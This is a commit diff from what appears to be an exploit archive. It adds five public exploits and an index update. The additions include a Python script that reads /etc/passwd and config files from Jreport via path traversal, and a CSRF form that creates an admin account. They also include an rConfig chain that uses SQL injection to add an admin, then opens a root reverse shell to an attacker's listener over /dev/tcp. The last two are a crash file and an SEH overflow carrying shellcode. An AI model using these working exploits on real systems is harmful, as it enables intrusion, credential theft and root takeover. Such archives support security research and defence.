DB: 2020-03-28

5 changes to exploits/shellcodes Everest 5.50.2100 - 'Open File' Denial of Service (PoC) Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH) ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin) Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution
2020-03-28 05:01:48 +00:00 · 2020-03-28 05:01:48 +00:00 · 284325fbf5
commit 284325fbf5
parent 4b289033f4
6 changed files with 335 additions and 0 deletions
--- a/exploits/java/webapps/48260.py
+++ b/exploits/java/webapps/48260.py
@ -0,0 +1,91 @@
+# Exploit Title: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal
+# Date: 2020-03-26
+# Exploit Author: hongphukt
+# Vendor Homepage: https://www.jinfonet.com/
+# Software Link: https://www.jinfonet.com/product/download-jreport/
+# Version: JReport 15.6
+# Tested on: Linux, Windows 
+
+Jreport Help function have a path traversal vulnerability in the SendFileServlet allows remote unauthenticated users to view any files on the Operating System with Application services user permission. This vulnerability affects Windows and Unix operating systems.
+Technical Details
+
+Jreport before loggedin have help function with url:
+
+https://serverip/jreport/sendfile/help/userguide/server/index.htm
+
+senfile url processing by jet.server.servlets.SendFileServlet class.
+
+            <servlet>
+
+                        <servlet-name>sendfile</servlet-name>
+
+                        <servlet-class>jet.server.servlets.SendFileServlet</servlet-class>
+
+            </servlet>
+
+            <servlet-mapping>
+
+                        <servlet-name>sendfile</servlet-name>
+
+                        <url-pattern>/sendfile/*</url-pattern>
+
+            </servlet-mapping>
+
+ 
+
+In jet.server.servlets.SendFileServlet class, request will go on when it’s authenticated or start url by ‘/help/’
+
+if ((!isAuthentic) &&
+
+        (!path.startsWith("/help/")))
+
+      {
+
+        httpRptServer.getHttpUserSessionManager().sendUnauthorizedResponse(req, res, this.D, httpRptServer.getResourceManager().getRealm());
+
+        return;
+
+      }
+
+ 
+
+So the function reading file without any path validation
+
+Exploit:
+
+Get login properties, /etc/password file by get url:
+
+ http://jreport.test/jreport/sendfile/help/../bin/login.properties
+
+ http://jreport.test/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd
+
+# Exploit Code
+
+import requests
+import argparse
+
+def exploit(url, file):
+    
+    session = requests.Session()
+    rawBody = "\r\n"
+    response = session.get("{}/jreport/sendfile/help/{}".format(url,file), data=rawBody)
+
+    if response.status_code == 404:
+        print("The '{}' file was not found.".format(file))	
+    else:
+        print("-" *22)
+        print(response.content)
+        print("-" *22)
+
+if __name__ == "__main__":
+
+    parser = argparse.ArgumentParser(description='Jreport Path traversal & Arbitrary File Download')
+    parser.add_argument('-u', action="store", dest="url", required=True, help='Target URL')
+    parser.add_argument('-f', action="store", dest="file", required=True, help='The file to download')
+    args = parser.parse_args()
+
+    exploit(args.url, args.file)
+
+# python jreport_fileread.py -u http://jreport.address -f "../../../../../../../../../../../../../../etc/passwd/"
+# python jreport_fileread.py -u http://jreport.address -f "../bin/login.properties"
+# python jreport_fileread.py -u http://jreport.address -f "../bin/server.properties"
--- a/exploits/php/webapps/48258.txt
+++ b/exploits/php/webapps/48258.txt
@ -0,0 +1,27 @@
+# Exploit Title : ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)
+# Product : ECK Hotel
+# Version : 1.0-beta
+# Date: 2020-03-26
+# Software Download: https://sourceforge.net/projects/eckhotel/files/eck-hotel-v1.0-beta.zip/download
+# Exploit Author: Mustafa Emre Gül
+# Website: https://emregul.com.tr/
+# Tested On : Win10 x64
+# Description : Simple Hotel Management System.
+
+
+PoC:
+<!--Unauthenticated Create Admin User -->
+<html>
+  <body>
+      <form action="localhost/index.php?module=user/user-add" method="POST">
+      <input type="hidden" name="nama" value="meg" />
+      <input type="hidden" name="id_user_role" value="1" />
+      <input type="hidden" name="jabatan" value="meg" />
+      <input type="hidden" name="nomor_telp" value="1" />
+      <input type="hidden" name="username" value="meg" />
+      <input type="hidden" name="password" value="meg" />
+      <input type="hidden" name="user-add" value="" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
--- a/exploits/php/webapps/48261.py
+++ b/exploits/php/webapps/48261.py
@ -0,0 +1,115 @@
+# Exploit Title: rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution
+# Exploit Author: vikingfr
+# Greetz : Orange Cyberdefense - team CSR-SO (https://cyberdefense.orange.com)
+# Date: 2020-03-12
+# CVE-2019-19509 + CVE-2019-19585 + CVE-2020-10220
+# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_root_RCE_unauth.py
+# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
+# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip
+# Install scripts  :
+# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
+# https://www.rconfig.com/downloads/scripts/centos7_install.sh
+# https://www.rconfig.com/downloads/scripts/centos6_install.sh
+# Version: tested v3.9.4
+# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
+#
+# Notes : If you want to reproduce in your lab environment follow those links :
+# http://help.rconfig.com/gettingstarted/installation
+# then
+# http://help.rconfig.com/gettingstarted/postinstall
+#
+# Example :
+# $ python3  rconfig_root_RCE_unauth_final.py http://1.1.1.1 1.1.1.2 3334
+# rConfig - 3.9 - Unauthenticated root RCE
+# [+] Adding a temporary admin user...
+# [+] Authenticating as dywzxuvbah...
+# [+] Logged in successfully, triggering the payload...
+# [+] Check your listener !
+# [+] The reverse shell seems to be opened :-)
+# [+] Removing the temporary admin user...
+# [+] Done.
+#
+# $ nc -nvlp 3334
+# listening on [any] 3334 ...
+# connect to [1.1.1.2] from (UNKNOWN) [1.1.1.1] 46186
+# sh: no job control in this shell
+# sh-4.2# id
+# id
+# uid=0(root) gid=0(root) groups=0(root)
+# sh-4.2# 
+
+#!/usr/bin/python3
+import requests
+import sys
+import urllib.parse
+import string
+import random
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+from requests.exceptions import Timeout
+
+print ("rConfig - 3.9 - Unauthenticated root RCE")
+
+if len(sys.argv) != 4:
+    print ("[+] Usage : ./rconfig_exploit.py https://target yourIP yourPort")
+    exit()
+
+target = sys.argv[1]
+ip = sys.argv[2]
+port = sys.argv[3]
+
+vuln_page="/commands.inc.php"
+vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"
+def generateUsername(stringLength=8):
+    u= string.ascii_lowercase
+    return ''.join(random.sample(u,stringLength))
+
+print ("[+] Adding a temporary admin user...")
+fake_id = str(random.randint(200,900))
+fake_user = generateUsername(10)
+fake_pass_md5 = "21232f297a57a5a743894a0e4a801fc3" # hash of 'admin'
+fake_userid_md5 = "6c97424dc92f14ae78f8cc13cd08308d"
+userleveladmin = 9 # Administrator
+addUserPayload="%20;INSERT%20INTO%20`users`%20(`id`,%20`username`,%20`password`,%20`userid`,%20`userlevel`,%20`email`,%20`timestamp`,%20`status`)%20VALUES%20("+fake_id+",%20'"+fake_user+"',%20'"+fake_pass_md5+"',%20'"+fake_userid_md5+"',%209,%20'"+fake_user+"@domain.com',%201346920339,%201);--"
+encoded_request = target+vuln_page+vuln_parameters+addUserPayload
+firstrequest = requests.session()
+exploit_req = firstrequest.get(encoded_request,verify=False)
+
+request = requests.session()
+login_info = {
+    "user": fake_user,
+    "pass": "admin",
+    "sublogin": 1
+}
+print ("[+] Authenticating as "+fake_user+"...")
+login_request = request.post(
+    target+"/lib/crud/userprocess.php",
+     login_info,
+     verify=False,
+     allow_redirects=True
+ )
+
+dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)
+
+payload = ''' `touch /tmp/.'''+fake_user+'''.txt;sudo zip -q /tmp/.'''+fake_user+'''.zip /tmp/.'''+fake_user+'''.txt -T -TT '/bin/sh -i>& /dev/tcp/{0}/{1} 0>&1 #'` '''.format(ip, port)
+if dashboard_request.status_code == 200:
+    print ("[+] Logged in successfully, triggering the payload...")
+    encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload))
+    print ("[+] Check your listener !")
+    try:
+        exploit_req = request.get(encoded_request,timeout=10)  
+    except Timeout:
+        print('[+] The reverse shell seems to be opened :-)')
+    else:
+        print('[-] The command was not executed by the target or you forgot to open a listener...')
+
+elif dashboard_request.status_code == 302:
+    print ("[-] Wrong credentials !? Maybe admin were not added...")
+    exit()
+
+print("[+] Removing the temporary admin user...")
+delUserPayload="%20;DELETE%20FROM%20`users`%20WHERE%20`username`='"+fake_user+"';--"
+encoded_request = target+vuln_page+vuln_parameters+delUserPayload
+lastrequest = requests.session()
+exploit_req = lastrequest.get(encoded_request,verify=False)
+print ("[+] Done.")
--- a/exploits/windows/dos/48259.py
+++ b/exploits/windows/dos/48259.py
@ -0,0 +1,21 @@
+# Exploit Title: Everest 5.50.2100 - 'Open File' Denial of Service (PoC)
+# Discovery by: Ivan Marmolejo
+# Discovery Date: 2020-03-24
+# Software Link : http://www.lavalys.com/
+# Tested Version: 5.50.2100
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Home Single Language
+
+# Steps to produce the crash:
+#1.- Run python code: Everest.py
+#2.- Open Everest.txt and copy content to clipboard
+#3.- Open "Everest Ultimate Edition"
+#4.- Select "Informe" > "Asistente de Informes" > "Next" > Select "Abrir Archivo"
+#5.- In "Abrir Archivo" field paste Clipboard
+#6.- Select "Next"
+#7.- Crashed
+
+buffer = "\x41" * 450
+f = open ("Everest.txt", "w")
+f.write(buffer)
+f.close()
--- a/exploits/windows/local/48257.py
+++ b/exploits/windows/local/48257.py
@ -0,0 +1,76 @@
+# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)
+# Date: 2020-03-26
+# Author: Felipe Winsnes
+# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
+# Version: 2.7.3.700
+# Tested on: Windows 7 (x86)
+
+# Proof of Concept:
+# 1.- Run the python script, it will create a new file "poc.txt"
+# 2.- Copy the content of the new file 'poc.txt' to clipboard
+# 3.- Open the Application
+# 4.- If the 'Preferences' windows pops up, just click 'Cancel'
+# 4.- Click 'Batch'
+# 5.- Delete everything on the parameter 'Input:' and paste the clipboard there
+# 6.- Select OK
+# 7.- Some Windows message boxes will pop up, click OK.
+# 8.- Profit
+
+# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Easy-RM-to-MP3-Converter-2.7.3.700-Input/
+
+import struct
+import sys
+
+# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread 
+# Payload size: 447 bytes
+
+buf =  b""
+buf += b"\xdb\xc4\xd9\x74\x24\xf4\x58\x50\x59\x49\x49\x49\x49"
+buf += b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37"
+buf += b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
+buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
+buf += b"\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x6b\x58\x4d\x52"
+buf += b"\x55\x50\x73\x30\x67\x70\x55\x30\x6c\x49\x4a\x45\x65"
+buf += b"\x61\x69\x50\x62\x44\x6c\x4b\x76\x30\x46\x50\x4e\x6b"
+buf += b"\x76\x32\x46\x6c\x6c\x4b\x52\x72\x65\x44\x6e\x6b\x72"
+buf += b"\x52\x74\x68\x44\x4f\x4f\x47\x73\x7a\x64\x66\x65\x61"
+buf += b"\x49\x6f\x4e\x4c\x47\x4c\x50\x61\x71\x6c\x34\x42\x66"
+buf += b"\x4c\x71\x30\x6b\x71\x58\x4f\x44\x4d\x46\x61\x68\x47"
+buf += b"\x4a\x42\x6c\x32\x51\x42\x63\x67\x4c\x4b\x76\x32\x72"
+buf += b"\x30\x4e\x6b\x33\x7a\x35\x6c\x4c\x4b\x50\x4c\x32\x31"
+buf += b"\x31\x68\x59\x73\x53\x78\x55\x51\x6b\x61\x70\x51\x4e"
+buf += b"\x6b\x70\x59\x47\x50\x35\x51\x68\x53\x6e\x6b\x51\x59"
+buf += b"\x37\x68\x6a\x43\x45\x6a\x62\x69\x6c\x4b\x54\x74\x6c"
+buf += b"\x4b\x55\x51\x4a\x76\x76\x51\x39\x6f\x6c\x6c\x6b\x71"
+buf += b"\x4a\x6f\x36\x6d\x77\x71\x6a\x67\x77\x48\x69\x70\x33"
+buf += b"\x45\x7a\x56\x64\x43\x61\x6d\x68\x78\x45\x6b\x53\x4d"
+buf += b"\x66\x44\x53\x45\x69\x74\x70\x58\x4e\x6b\x76\x38\x74"
+buf += b"\x64\x77\x71\x38\x53\x52\x46\x6e\x6b\x34\x4c\x72\x6b"
+buf += b"\x6e\x6b\x56\x38\x45\x4c\x57\x71\x38\x53\x6c\x4b\x75"
+buf += b"\x54\x6e\x6b\x76\x61\x4a\x70\x4e\x69\x67\x34\x44\x64"
+buf += b"\x31\x34\x51\x4b\x73\x6b\x43\x51\x30\x59\x51\x4a\x53"
+buf += b"\x61\x59\x6f\x49\x70\x31\x4f\x33\x6f\x63\x6a\x6c\x4b"
+buf += b"\x57\x62\x68\x6b\x6c\x4d\x73\x6d\x42\x4a\x33\x31\x4c"
+buf += b"\x4d\x4f\x75\x4e\x52\x73\x30\x35\x50\x47\x70\x66\x30"
+buf += b"\x51\x78\x35\x61\x4e\x6b\x42\x4f\x6f\x77\x59\x6f\x58"
+buf += b"\x55\x4f\x4b\x4d\x30\x35\x4d\x75\x7a\x65\x5a\x63\x58"
+buf += b"\x49\x36\x4f\x65\x6d\x6d\x6d\x4d\x79\x6f\x79\x45\x45"
+buf += b"\x6c\x77\x76\x33\x4c\x57\x7a\x4f\x70\x6b\x4b\x69\x70"
+buf += b"\x74\x35\x57\x75\x6d\x6b\x33\x77\x65\x43\x43\x42\x62"
+buf += b"\x4f\x32\x4a\x37\x70\x53\x63\x79\x6f\x6a\x75\x33\x53"
+buf += b"\x35\x31\x72\x4c\x61\x73\x54\x6e\x61\x75\x61\x68\x75"
+buf += b"\x35\x57\x70\x41\x41"
+
+nseh = struct.pack("<I", 0x06710870)
+seh = struct.pack("<I", 0x10025A2E) # 0x10025a2e : pop ecx # pop esi # ret  | ascii {PAGE_EXECUTE_READ} [MSRMfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter03.dll)
+
+buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 5 + buf + "\xff" * 200
+
+try:
+    f = open ("poc.txt", "w")
+    f.write(buffer)
+    f.close()
+    print "[+] The file has been created successfully!"
+
+except:
+    print "[!] There has been an error while creating the file."
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6688,6 +6688,7 @@ id,file,description,date,author,type,platform,port
 48216,exploits/windows/dos/48216.md,"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)",2020-03-14,eerykitty,dos,windows,
 48236,exploits/ios/dos/48236.py,"ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)",2020-03-23,"Ivan Marmolejo",dos,ios,
 48237,exploits/windows/dos/48237.txt,"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)",2020-03-23,"Cem Onat Karagun",dos,windows,
+48259,exploits/windows/dos/48259.py,"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)",2020-03-27,"Ivan Marmolejo",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -11001,6 +11002,7 @@ id,file,description,date,author,type,platform,port
 48249,exploits/windows/local/48249.txt,"AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path",2020-03-25,"Roberto Piña",local,windows,
 48251,exploits/windows/local/48251.txt,"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path",2020-03-25,"Felipe Winsnes",local,windows,
 48253,exploits/windows/local/48253.py,"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)",2020-03-25,"Felipe Winsnes",local,windows,
+48257,exploits/windows/local/48257.py,"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)",2020-03-27,"Felipe Winsnes",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42503,3 +42505,6 @@ id,file,description,date,author,type,platform,port
 48250,exploits/php/webapps/48250.txt,"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting",2020-03-25,SunCSR,webapps,php,
 48255,exploits/hardware/webapps/48255.py,"TP-Link Archer C50 3 - Denial of Service (PoC)",2020-03-26,thewhiteh4t,webapps,hardware,
 48256,exploits/php/webapps/48256.py,"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution",2020-03-26,"Engin Demirbilek",webapps,php,
+48258,exploits/php/webapps/48258.txt,"ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)",2020-03-27,"Alperen Soydan",webapps,php,
+48260,exploits/java/webapps/48260.py,"Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal",2020-03-27,hongphukt,webapps,java,
+48261,exploits/php/webapps/48261.py,"rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution",2020-03-27,vikingfr,webapps,php,